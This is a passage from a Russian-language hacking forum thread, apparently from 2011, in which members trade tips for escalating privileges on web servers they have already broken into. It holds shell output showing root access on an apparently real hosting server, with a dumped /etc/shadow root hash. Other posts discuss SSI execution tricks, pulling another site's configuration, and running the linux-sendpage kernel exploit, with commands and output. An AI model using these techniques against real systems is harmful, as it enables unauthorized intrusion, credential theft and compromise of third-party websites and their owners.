Старый 09.08.2011, 14:46   #51
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

а НЕ пхп?
snake вне форума   Ответить с цитированием
Старый 09.08.2011, 15:51   #52
Cross
 
Регистрация: 27.08.2010
Сообщений: 114
Репутация: 2
По умолчанию

Цитата:
Сообщение от snake Посмотреть сообщение
а НЕ пхп?
пусто, ни питона, ни перла, руби....
а ядро 2006 года... =(
Cross вне форума   Ответить с цитированием
Старый 09.08.2011, 16:14   #53
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

https://rdot.org/forum/showthread.php?t=1607
https://rdot.org/forum/showthread.php?t=1143
col вне форума   Ответить с цитированием
Старый 10.08.2011, 08:51   #54
Cross
 
Регистрация: 27.08.2010
Сообщений: 114
Репутация: 2
По умолчанию

Цитата:
Сообщение от col
https://rdot.org/forum/showthread.php?t=1607
http://www.ntu.url.tw/wordpress/glass.shtml
там же:
Цитата:
AddType text/html .shtml
AddHandler server-parsed .shtml
Options Includes
Код:
Loaded Apache modules: core, mod_access, mod_auth, mod_include, mod_log_config, mod_env, mod_setenvif, prefork, http_core, mod_mime, mod_status, mod_autoindex, mod_asis, mod_cgi, mod_negotiation, mod_dir, mod_imap, mod_actions, mod_userdir, mod_alias, mod_rewrite, mod_so, mod_php5, mod_security, mod_logio, mod_limitipconn, mod_fileiri, mod_geoip
На локалке:
Код:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
 mymailer@corp.url.com.tw and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
</body></html>
Cross вне форума   Ответить с цитированием
Старый 10.08.2011, 11:02   #55
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

Цитата:
https://rdot.org/forum/showthread.php?t=1607
х*йня там,в 90% случаев не добиться нормально работающего выполнения в ssi,только инфо из env.

Цитата:
пусто, ни питона, ни перла, руби....
а ядро 2006 года... =(
Думаю ты просто плохо искал((
snake вне форума   Ответить с цитированием
Старый 10.08.2011, 13:22   #56
salut
 
Регистрация: 07.04.2011
Сообщений: 65
Репутация: 0
По умолчанию

есть шелл..нужно виташит конфиг из сервера другово сайта..какие варианты?
сервер:
Цитата:
Linux ******* 2.6.18-238.9.1.el5 #1 SMP Tue Apr 12 18:10:13 EDT 2011 x86_64
salut вне форума   Ответить с цитированием
Старый 11.08.2011, 11:37   #57
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

2 Cross


Цитата:
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(di sk),10(wheel)
whoami
root
uname -a
Linux lweb14.url.com.tw 2.6.9-42.ELsmp #1 SMP Wed Jul 12 23:27:17 EDT 2006 i686 i686 i386 GNU/Linux
cat /etc/shadow | grep root
root:$1$Yz7B9gLE$4l6aV6d3kXgh/jw4R6p7/0:14897:0:99999:7:::
=\
заняло 3 минуты,а ты пол темы развел.
snake вне форума   Ответить с цитированием
Старый 11.08.2011, 18:57   #58
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

Цитата:
Сообщение от col Посмотреть сообщение
2.6.9-89.0.11.ELsmp #1 SMP Mon Aug 31 11:01:10 EDT 2009 i686
что то ничего не берет, glibc не работает
$ cat /proc/sys/vm/mmap_min_addr 2>&1
0
до сих пор не нашел ничего подходящего
невыполнимо?
col вне форума   Ответить с цитированием
Старый 11.08.2011, 21:28   #59
Twost
 
Аватар для Twost
 
Регистрация: 03.07.2010
Сообщений: 172
Репутация: 110
По умолчанию

Цитата:
Сообщение от col Посмотреть сообщение
до сих пор не нашел ничего подходящего
невыполнимо?
Sendpage все попробовал? Если не ошибаюсь, то вроде бы третий у меня пробил аналогичное
Twost вне форума   Ответить с цитированием
Старый 11.08.2011, 23:21   #60
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

Цитата:
Сообщение от Twost Посмотреть сообщение
Sendpage все попробовал? Если не ошибаюсь, то вроде бы третий у меня пробил аналогичное
PHP код:
sh-3.00tar -zxf 2009*
sh-3.00ls
2009
-linux-sendpage3.tar.gz
linux
-sendpage3
sh
-3.00cd linux*
sh-3.00ls
exploit
-pulseaudio.c
exploit
.c
run
runcon
-mmap_zero
sesearch
-mmap_zero
./run
sh
-3.00socketAddress family not supported by protocol
socket
Address family not supported by protocol
socket
Address family not supported by protocol
socket
Address family not supported by protocol
socket
Address family not supported by protocol
socket
Address family not supported by protocol
sh
-3.00id
uid
=48(apachegid=48(apachegroups=48(apache),2523(psaserv),2524(psacln),10035
(idpp_upload
col вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot